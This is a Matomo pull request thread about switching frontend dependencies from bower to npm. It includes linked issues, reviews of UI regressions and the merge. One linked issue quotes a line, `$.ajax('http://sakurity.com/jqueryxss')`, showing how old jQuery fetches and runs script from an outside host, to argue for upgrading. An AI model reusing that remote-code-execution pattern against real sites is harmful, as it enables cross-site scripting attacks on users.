### PR TITLE
Switch from bower to npm and update JS libraries

### LINKED ISSUE #12067: replace bower (and libs/) with npm
(I think this issue is really low priority but quite important to do one day so I want to start a discussing)

In my opinion keeping all third-party-libraries checked into the main repository is a bad idea. It makes it hard to see which libraries are outdated and have bugs, which may be already fixed upstream, which LICENSEs belong to which files and which files aren't used any more (There are placeholder background images from the first visitor popup lying around in `/libs/jquery/images/`)

For PHP libraries Piwik is [(mostly)](https://github.com/piwik/piwik/pull/12021) using composer to solve this issue, so I'd propose to do the same with javascript (and css) libraries and npm.

While bower also helps, it doesn't support as many libraries and even the bower team recommends switching to npm. 

Since version 5 npm also supports a lockfile similar to composer which would make sure that the CI and the built package would have the same version as tested while developing. 

Another advantage would be that we would have a well formated list of used libraries and their licenses (compared to LEGALNOTICE), which may help avoiding incompatible licenses (e.g. version 3 of jQuery.dotdotdot)

see also #6469, #12021

### LINKED ISSUE #12961: update frontend libraries like jquery
I know this is a tedious task with no direct benefit, but the possibility of breaking some things.

But most JS libraries haven't been updated since Piwik 3 in 2016. And since then many things changed, new browsers appeared and security issues were found.

One of the largest that (kind of) affects Matomo is https://nodesecurity.io/advisories/328 which affects all jQuery versions <3.0.0
Simply said running 
```
$.ajax('http://sakurity.com/jqueryxss')
```
in Matomo executes the JavaScript at `http://sakurity.com/jqueryxss`.
Thankfully @sgiehl had the great foresight 6 years ago when creating the ajaxhelper (in https://github.com/matomo-org/matomo/commit/99793151cd6d4f318b7a011509bd421685f0537a) to fallback to "json" as a format, so I think Matomo isn't affected.

But I still think that updating JS regularly will avoid possible future issues.

(The same can be said for composer dependencies, but thanks to the new npm audit command, checking for security issues in frontend libraries was easier)
Update: It seems like https://packagist.org/packages/roave/security-advisories is something similar for php dependencies

### PR DESCRIPTION
**Pull request by diosmosis**
Still a WIP.

NOTE: This will require updates to premium plugins.

TODO (in other PRs most likely):
* [x] get tests to pass
* [ ] update individual libraries and get tests to pass
* [x] BC for bower_components folder
* [ ] run tests of premium plugins and get them to pass
* [ ] replace other libraries in libs/ and in plugin directories

Refs #12961 
Fixes #12067

### CODE REVIEW

**Comment by Findus23** [comment]
@diosmosis Thanks for starting this work
See also #12067 for an old example package.json

It also seems like this doesn't really solve #12961 as jQuery <3 is still used.

**Comment by diosmosis** [comment]
Currently just getting tests to pass w/ npm libs, some of whom required an update (eg, materializecss < 1.0 includes some node dependencies which we can't include in the repo, & some repos don't have the versions we use available). Then I'll upgrade libs and get tests to pass again.

Thanks for the warning about dotdotdot!

**Comment by tsteur** [comment]
@diosmosis fyi changing the bower_components folder will be a BC break. They are used in various of our extra plugins and premium features. I assume also other plugins use it. Ideally we would keep the same directory structure and change it in Matomo 4 if possible. 

Also just to confirm we still commit the files to the repository right? Just making sure as it really does make installing and updating easier as you wouldn't need node.js to install it and makes sure everyone is using the same version. I would even go so far and commit the vendor directory eventually. Personally, I rarely run composer install after a branch change and things might not always be tested properly because of this. Just makes things easier and more consistent.

**Comment by diosmosis** [comment]
> fyi changing the bower_components folder will be a BC break. They are used in various of our extra plugins and premium features. I assume also other plugins use it. Ideally we would keep the same directory structure and change it in Matomo 4 if possible.

Unfortunately, npm doesn't support specifying a different node_modules folder (though yarn does, so npm might in the future). I think for this we'd have to either change premium plugins to use the correct folder based on the matomo version, or give up until Matomo 4.

> Also just to confirm we still commit the files to the repository right?

Yes, so far no complications. If a library decides to include dependencies then it could get annoying, but I don't think it would be a real blocker.

**Comment by tsteur** [comment]
> Unfortunately, npm doesn't support specifying a different node_modules folder (though yarn does, so npm might in the future). I think for this we'd have to either change premium plugins to use the correct folder based on the matomo version, or give up until Matomo 4.

Was thinking a symlink but reckon that might not be working on all systems. I reckon we could otherwise - if needed - have a little to do the npm update and manually move `node_modules` to `bower_components` as we commit it anyway? may be bit too annoying though.

It's likely not only premium features that use it but all plugins. Ideally we check the plugins on the marketplace to see if any of them use it (I think we used to have a search engine for that but don'T remember URL or if it still works). Most plugins won't be on the marketplace though...

Actually just thought of a better solution: We can rewrite the path in the asset manager and it'll be no problem :)

**Comment by diosmosis** [comment]
> I reckon we could otherwise - if needed - have a little to do the npm update and manually move `node_modules` to `bower_components` as we commit it anyway? may be bit too annoying though.

This could be put into a command and a test added to ReleaseCheckListTest (since we have the list of files we use in the getJavaScriptFiles hook).

> Actually just thought of a better solution: We can rewrite the path in the asset manager and it'll be no problem :)

I see you beat me to it :) I was thinking of creating symlinks when merging assets, but using a map of bower_components => node_modules links works better. Will do this.

**Comment by diosmosis** [comment]
Moved this to 3.11 since it should probably be in a beta.

**Comment by Findus23** [comment]
I agree. As much as I am for updating all JS libraries, this might introduce quite a few subtle bugs and we should especially get as many people as possible to beta-test this.

**Comment by diosmosis** [comment]
Moving to 4.0 as discussed in #12961

**Comment by diosmosis** [comment]
@tsteur / @sgiehl this should be ready for a review. This PR was meant to just be a switch to npm, but some libraries we use don't have the versions we use in npm, so it included several upgrades to the minimum version on npm (including materialize & jquery-ui). So after it's merged, another PR will have to be done which runs npm update. There are also some libraries in libs/ I didn't replace, but probably could be.

**Review by sgiehl — CHANGES_REQUESTED** [review]
Roughly looked through the code changes and left a few comments.
Will now do some local testing and add some more comments if anything is broken.
Btw. there are some smaller changes in colors and margins. Doesn't look bad to me, so should imho be fine.
~Also the changes to `plugins/Overlay/tests/UI/expected-screenshots/Overlay_page_link_clicks.png` doesn't seem correct. The test is failing on 4.x-dev. Not sure why that part isn't shown anymore.~ see #16016

**Comment by sgiehl** [comment]
Visitor profile doesn't opened centered anymore, and there are some pixels overlapping on the grey headers:
image

All other popovers are centered when they are opened, but are not repositioned anymore after the content was loaded.

**Comment by sgiehl** [comment]
Hovering row actions on subtable rows now show both tooltips:

image

**Comment by sgiehl** [comment]
Browsing the marketplace though normal menu looks bit broken (looks better when visiting though admin menu):
image
Also the button text color was white for disabled buttons before.

**Comment by sgiehl** [comment]
Drop down for compare periods looks broken:
image

**Comment by sgiehl** [comment]
spacing between combined input fields in CustomAlerts plugin is broken:

image

**Comment by sgiehl** [comment]
GoTo links on tracking code page don't work anymore:

image

**Comment by sgiehl** [comment]
@diosmosis that's all I found so far by clicking through the UI. There might be some more regressions maybe, but imho it should be fine to merge this once those I already found are fixed. We can fix anything else later to avoid more merge conflicts with this PR

File: libs/HTML/QuickForm2/Element/InputCheckable.php
Comment (diosmosis) [reply libs/HTML/QuickForm2/Element/InputCheckable.php:156]: Only way it works w/ new materialize is w/ the input nested in the label.

File: package.json
Comment (diosmosis) [reply package.json:42]: 👍

File: plugins/CoreHome/angularjs/period-selector/period-selector.directive.html
Comment (diosmosis) [reply plugins/CoreHome/angularjs/period-selector/period-selector.directive.html:78]: 👍

File: plugins/CoreHome/javascripts/materialize-bc.js
Comment (diosmosis) [reply plugins/CoreHome/javascripts/materialize-bc.js:4]: 👍

File: plugins/CorePluginsAdmin/angularjs/form-field/field-field-array.html
Comment (diosmosis) [reply plugins/CorePluginsAdmin/angularjs/form-field/field-field-array.html:4]: It's because we're binding a value to the matomo-field-array directive rather than setting the name attribute.

**Comment by diosmosis** [comment]
> Hovering row actions on subtable rows now show both tooltips:

I'm not sure how best to fix this one. It's due to the tooltips being nested, only way around it I can see is to add the tooltip to the label column. However if there's no cell tooltip, then it won't display over other columns...

File: package.json
Comment (sgiehl) [reply package.json]: package-lock.json might still need an update

**Comment by sgiehl** [comment]
Another note that came up to my mind: In the original issue we discussed if it might make sense to add the node_module files to git, so they are included in the checkout. Otherwise guess we need to adjust some guides about how using Matomo from git and also adjust the build script, as the files need to be included in the release package

**Comment by sgiehl** [comment]
@diosmosis I've updated branch and also fixed some of the tiny issues I had mentioned before.
Did you already have time to look at the tooltip issue? Should imho be the last remaining one...

**Comment by diosmosis** [comment]
@sgiehl the fix for the tooltip issue is to switch to materialize, which I haven't looked into yet. The archiving PRs are currently my focus.

**Comment by sgiehl** [comment]
@diosmosis I've tried switching to materialize tooltips. But it's a bit more work to do as I thought. We are using callbacks in some cases to determine the content of the tooltips and whether they should be shown or not. That is not supported by materialize tooltips. So we would need to change that. Also materialize uses the same jQuery wrapper for tooltips as jquery ui, so we can't use the `.tooltip()` method anymore or would need to use a custom jquery ui build without the tooltips...

I've now pushed a hackish solution that only fixes the issue for the datatable row actions. Might be enough for the moment, as I didn't find any other overlapping tooltip yet. Maybe we can go with this solution for now and create a follow up issue to maybe even remove jquery ui completely with a later release.

**Comment by diosmosis** [comment]
> I've now pushed a hackish solution that only fixes the issue for the datatable row actions. 

If it works, this sounds good to me, whatever takes the least amount of time at this point.

**Pull request merged**
